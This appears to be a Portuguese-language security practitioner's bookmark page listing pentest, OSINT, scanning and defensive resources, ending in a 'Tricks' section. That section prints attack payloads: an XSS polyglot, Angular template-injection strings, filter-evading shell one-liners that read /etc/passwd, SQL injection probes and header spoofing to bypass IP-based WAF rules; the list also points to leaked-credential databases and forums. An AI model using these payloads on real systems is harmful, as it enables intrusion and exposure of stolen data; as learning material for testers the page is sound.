Links Úteis

05-01-2021

Blogs
https://thehackernews.com/
https://www.cisoadvisor.com.br/
https://threatpost.com/
https://cgreinhold.dev/
https://snyk.io/blog/
https://www.troyhunt.com/
https://samy.pl/
https://www.malwaretech.com/
https://minutodaseguranca.blog.br/
https://www.welivesecurity.com
https://secnhack.in/
https://www.syhunt.com/pt/?n=News.2021-Leaks&key=lucy17 (Leaks Feed)

Youtubers
https://youtube.com/LiveOverflowCTF
https://youtube.com/c/DavidBombal/
https://youtube.com/c/JohnHammond010/
https://youtube.com/stokfredrik
https://youtube.com/c/GabrielPato/

Github profiles
https://github.com/carlospolop
https://github.com/KingOfBugbounty
https://github.com/helviojunior
https://github.com/VitorOriel

Web Scanners
https://gf.dev/toolbox/ (Canivete suiço para ambientes Web)
https://www.ssllabs.com/ssltest/ (Diversas verificações para sistemas Web)
https://hstspreload.org/ (Teste para HSTS simples e direto)
https://observatory.mozilla.org/ (Diversas verificações para sistemas Web)
https://securityheaders.com/ (Verificações focadas em HTTP Headers necessários)
https://www.securityscore.com.br/ (Scan que vai além do sistema web, consulta e-mails e portas associadas ao domínio)
https://spyse.com/ (Scanner de informações públicas do site, crawler, url de js e css’s)

Senhas
https://haveibeenpwned.com/ (Verificação de vazamento de senhas)
https://spycloud.com (Verifica os vazamentos associados a sua conta com a informação das senhas abertas)
https://intelx.io/ (Consulta à base de dados de vazamentos)
http://pwndb2am4tzkvold.onion/ (Consulta à base de vazamentos)
http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion (Consulta à base de vazamentos)
https://raidforums.com (Forum com exposição de vazamentos)

OSINT
https://search.censys.io/ (Scan de IPs e portas)
https://www.shodan.io/ (Scan de IPs e portas)
https://wigle.net/ (Mapeamento mundial de redes wifi)
https://www.exploit-db.com/google-hacking-database/ (Google dorking)
https://www.shhgit.com/ (Monitoramento em tempo real de possíveis informações sensíveis sendo commitadas no GitHub, GitLab e BitBucket)
https://osintframework.com/ (Grande indexador de ferramentas e OSINT’s para reconhecimento e pentest)
https://netbootcamp.org/osinttools/ (Agregador de ferramentas de reconhecimento de domínio e social)
https://community.riskiq.com/ (Scanner de informações públicas, encontra bastante subdomínios e só serve para isso na conta gratuíta)
http://securitytrails.com (Eficiente para encontrar subdomínios)
https://gf.dev/whois-hosting (Descobrir caminhos de IPs de um site)

Web Tools
https://gchq.github.io/CyberChef/ (Canivete suiço. Diversos ‘utils’, scrab, estractor, etc)
https://www.processlibrary.com/en/ (Busca de dlls e processos)
https://id-ransomware.malwarehunterteam.com/ (Identificar ransomware)
https://caniuse.com/ (Verificação de compatibilidade de browsers)
https://grabify.link/ (Encurtado de links com IP logger)
https://archive.org/web/ (Way back machine - Histórico das páginas antigas)
https://beautifier.io/ (Transforma um js minificado para legível)

Desktop Tools
https://beefproject.com/
http://sqlmap.org/
https://docs.microsoft.com/en-us/sysinternals/ (Canivete suiço de ferramentas de análise de ambiente)
https://pentestbox.org/pt/ (Várias ferramentas em sandobox sem necessidade de subir uma VM)
https://github.com/globocom/huskyCI (Ferramenta feito pela Globo. Orquestrador de análise de código de repositório para rodar junto com um CI)
https://github.com/Genymobile/scrcpy (Solução para transmitir a tela do celular para o computador)
https://www.postman.com/ (Monta requisições Http sob demanda)
https://dbeaver.io/ (Conector com banco de dados universal)
https://nordvpn.com/ (VPN para comunicação segura - Pago)
https://github.com/assetnote/kiterunner (Endpoint spider)
https://github.com/KingOfBugbounty/SecretFinder (Procura por possíveis chaves em arquivos HTML ou Js)
https://github.com/lirantal/is-website-vulnerable (Alternativa open source para auditar as tecnologias front end de um sistema web, com resultados objetivos e claros indicando os problemas)
https://github.com/projectdiscovery/nuclei
https://github.com/skavngr/rapidscan (multi-tool web vulnerability scanner)
https://github.com/NESCAU-UFLA/FuzzingTool

Browser plugins
KeyFinder
Web scan

Pentest (DAST)
https://www.zaproxy.org/ (scripts link)
https://subgraph.com/vega/
https://github.com/1N3/Sn1per/
https://owasp.org/www-community/Vulnerability_Scanning_Tools (Lista de várias ferramentas pagas e free)
https://start.me/p/BnBb5v/jornadas-osint (Reune vários links OSINTs, buscadores de nicks, de imagens, de pessoas, etc)

Analisadores de tráfego
https://portswigger.net/burp/
https://www.charlesproxy.com/
https://www.telerik.com/fiddler
https://www.wireshark.org/

Listas
https://github.com/danielmiessler/SecLists (Payloads)
https://github.com/swisskyrepo/PayloadsAllTheThings (Payload para quase tudo)
https://github.com/sindresorhus/awesome#security (Indexador de materiais para pentest, recon, etc)
https://github.com/carpedm20/awesome-hacking#readme (Indexador de materiais para pentest, recon, etc)
https://github.com/qazbnm456/awesome-web-security#readme (Indexador de materiais para pentest, recon, etc)
https://github.com/sbilly/awesome-security#web (Indexador de materiais para pentest, recon, etc)
https://www.routerpasswords.com/ (Lista de senhas padrões de dispositivos)
https://minutodaseguranca.blog.br/lista-completa-de-ferramentas-de-teste-de-penetracao-e-hacking/
https://github.com/nixawk/pentest-wiki (Indexador e guia para recon e pentests)

Sobre API keys
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
https://community.turgensec.com/finding-hidden-api-keys-how-to-use-them/

Sobre AWS Buckets
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3

Criptografia, Hash databases e crackers
https://hashdecryption.com/
https://emn178.github.io/online-tools/
https://hashtoolkit.com/
https://www.perturb.org/content/hashes/
http://hashmash.info/
https://md5hashing.net/
https://sha1.gromweb.com/
https://www.boxentriq.com/code-breaking/cipher-identifier/ (Analisador de possível tipo de cifra utilizado)
https://www.openwall.com/john/ (John the Ripper password cracker)
https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm (Base para download)
https://hstrike.com/ (Algumas ferremantes para análise de criptografias e senhas)

Aplicação para validação de web scanners
http://public-firing-range.appspot.com/

Databases para verificação de vulnerabilidade de bibliotecas
https://snyk.io/vuln |
https://ossindex.sonatype.org/
https://cve.mitre.org/cve/search_cve_list.html
https://www.nuget.org/packages/Audit.NET/ (Extensão para Visual Studio)

Verificação de DNS
https://toolbox.googleapps.com/apps/dig/
https://dnslytics.com/
https://mxtoolbox.com/

Mapas mentais, diagramas e prototipação
https://www.mindmeister.com/
https://miro.com/app/

Compartilhamento de arquivos e textos
https://gofile.io/
https://pastebin.com/
http://dontpad.com/

Emissão de certificado Https baixo ou nenhum custo
https://letsencrypt.org/

CORS ByPass
https://cors-anywhere.herokuapp.com/

Reverse Tabnabbing
https://security.christmas/2019/12
https://owasp.org/www-community/attacks/Reverse_Tabnabbing
https://github.com/OWASP/www-community/blob/master/pages/attacks/Reverse_Tabnabbing.md

CSP
https://cspscanner.com/ (Teste simples para CSP)
https://csper.io/evaluator (Avaliador para CPS)
https://csper.io/generator/ (Gerador de CSP)
https://developer.mozilla.org/pt-BR/docs/Web/HTTP/CSP
https://owasp.org/www-community/attacks/Content_Security_Policy

Lax vs Strict
https://blog.benpri.me/blog/2019/05/13/samesite-cookies-in-practice/

XSS Game
https://xss-game.appspot.com

I Know What You Download
https://iknowwhatyoudownload.com/en/peer/

Regras de boas práticas para desenvolvimento do Sonar
https://rules.sonarsource.com/csharp

CheatSheets e prevenções

Geral - OWASP cheatsheetseries link
XSS - Portswigger XSS cheatsheet link
XSS - OWASP XSS cheatsheet link
DOM XSS - OWASP DOM XSS cheatsheet link
XSS - XSS payloads além do alert link
XSS - PayloadsAllTheThings payloads link
Markdown XSS - https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
SQLi - Portswigger SQLi cheatsheet link
SQLi - Netsparker SQLi cheatsheet link
Privilege Escalation - https://github.com/Ignitetechnologies/Privilege-Escalation/
Burp - https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

Angular template injection

.Net
https://github.com/pwntester/ysoserial.net (Exploit unsafe .NET object deserialization)

Calcular nível de vulnerabilidades
https://www.first.org/cvss/calculator/3.0
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Coleção de relatórios de pentestes
https://github.com/juliocesarfort/public-pentesting-reports

Eventos
https://bekk.christmas/
https://security.christmas/
https://tryhackme.com/room/25daysofchristmas

Security Awareness

Personal Security Checklist
https://github.com/Lissy93/personal-security-checklist

Cofre de senhas
https://bitwarden.com/

Quiz do Google sobre phishing
https://phishingquiz.withgoogle.com/

Critérios de segurança no código
https://security-code-scan.github.io/

Guides

CTO Security Checklist/Guide
https://www.goldfiglabs.com/guide/saas-cto-security-checklist/

Bugbounty Tips
https://github.com/KingOfBugbounty/KingOfBugBountyTips

Verificação de assinaturas de arquivos
https://www.garykessler.net/library/file_sigs.html

Livros
https://book.hacktricks.xyz/
https://www.manning.com/books/api-security-in-action

4 coisas que todo relatório deve ter
https://rhinosecuritylabs.com/penetration-testing/four-things-every-penetration-test-report/

Focar nos itens importantes do guide, como e o que utilizar
https://www.apriorit.com/dev-blog/622-qa-web-application-pen-testing-owasp-checklist

Security Design Guidelines for Web Services
https://msdn.microsoft.com/en-us/library/ff649737.aspx

Sobre HSTS
https://www.troyhunt.com/understanding-http-strict-transport

12 Discas contra DDoS
https://blog.4linux.com.br/12-metodos-para-prevenir-ddos/

Como implementar corretamente o Salt
https://crackstation.net/hashing-security.htm

Dicas para quem programa em .Net
https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html (Tópico ‘ASP NET Web Forms Guidance’, sobre CSRF e ViewState)

Comunicação segura: Jitsi, Signal ou Wire
https://thehackernews.com/2020/04/zoom-cybersecurity-hacking.html

For everything else that requires sharing sensitive information, there are more secure options like self-hosted Jitsi, Signal and Wire.

WCF: Dicas de client
https://www.oreilly.com/library/view/programming-wcf-services/9781449382476/ch01s13.html

Fundamentos do GC
https://docs.microsoft.com/en-us/dotnet/standard/garbage-collection/fundamentals?redirectedfrom=MSDN#background_server_garbage_collection

Tricks

jQuery Version:

1
alert(jQuery.fn.jquery);

XSS poliglota

1
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Angular:

1
2
3
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
1023+1 ou {{1023+1}}

Reading /etc/passwd File:

1
2
3
4
5
6
7
8
1) cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
2) ??n/??t$IFS/?tc/????wd
3) ??n${PATH%%[a-z]*}??t$IFS${PATH%%[a-z]*}??c${PATH%%u*}?????d

Explantion:
$'\x41' => 'A' (HEX)
$'\U41' => 'A' (HEX Unicode)
$'\101' => 'A' (Octal)

SQL Injection exemplos:

1
2
3
4
5
6
7
8
9
10
1+OR/AND+1=1 and sELeCt/*Test*/1 and so .

/?id=1%27%20AND%20%271%27=LENGTH(%27;%27)%20--+
/?id=1%27%20AND%20%271%27=LENGTH(%27;;%27)%20--+

/?id=1%27%20AND%20%271%27=STRCMP(%22;%22,%20%22;%22);%20--+
/?id=1%27%20AND%20%271%27=STRCMP(%22;;%22,%20%22;%22);%20--+

/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=1)%20--+
/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=12)%20--+

WAF - ByPass Controle por IP

1
2
3
4
5
6
7
8
9
10
X-Originating-IP:localhost
X-Forwarded-For:localhost
X-Remote-IP:localhost
X-Remote-Addr:localhost
X-Forwarded-Host:localhost
X-Client-IP:localhost
X-Remote-IP:localhost
X-Remote-Addr:localhost
X-Host:localhost
True-Client-Ip:localhost

Insecure Deserialization

1
2
Payloads: https://github.com/pwntester/ysoserial.net
Json insercure deserialization: https://medium.com/r3d-buck3t/insecure-deserialization-with-json-net-c70139af011a